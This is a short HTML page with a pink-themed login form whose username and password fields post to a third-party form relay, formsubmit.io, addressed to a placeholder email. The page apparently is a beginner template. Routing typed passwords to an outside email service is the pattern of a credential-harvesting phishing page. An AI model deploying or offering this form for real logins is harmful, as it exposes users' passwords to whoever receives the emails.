<html>
    <head><title>ThirdPageForm</title></head>
    <style>
    body {
        background-image: url("https://media.tenor.com/LIM90eHf7F4AAAAd/aesthetic-pink.gif");
    }
    </style>
        <center>

            <div class="container">
                <h1><font color="black">LOGIN</font></h1>
                    <div class="centered">
                        <b>
                        <br>
                        <content>
                        <div class="loginform">
            <form id="contactform" action="https://formsubmit.io/send/put your email here" method="POST">
            <label for="usernameoremail">Username/Email:</label>
            <input type="email" name="usernameoremail" id="ename" required>
<br>
            <label for="password">Password:</label>
            <input type="password" name="password" id="Pass" required>
                       </div>
                       </content>
            <style>
                input{
                    
                    border-color: aquamarine;
                    display:inline-block;
                    height:34px;
                    border-radius:22px;
                    width:220px;
                    box-sizing:border-box;
                    padding:0 18px; 
                }
            </style>

<br>
            <button type="submit" style="background-color: aqua;">Log-In</button>
            <button type="reset" style="background-color: aqua;">Cancel</button>

             <style>
                button{ 

                    border-color: red;
                    display:inline-block;
                    height:34px;
                    border-radius:22px;
                    width:100px;
                    box-sizing:border-box;
                    padding:0 18px; 

               cursor:pointer;
}
            </style>
<style>
    .container {
     position: relative;
     text-align: center;
     display: grid;
     grid-template-columns: 1/2;
     grid-template-rows: 100px 200px 20px;
     border-radius: 20px;
     border: 2px solid rgb(49,49,49);
     width: 350;
     height: 350;
     background-color: rgba(251, 247, 247,0.388);
     backdrop-filter: blur(20px);
     box-shadow: 2px 5px 15px black;

     }
     .centered {
     position: absolute;
     top: 50%;
     left: 50%;
     transform: translate(-50%, -50%);
}
</style>
</b>
        </center>
    </body>
</html>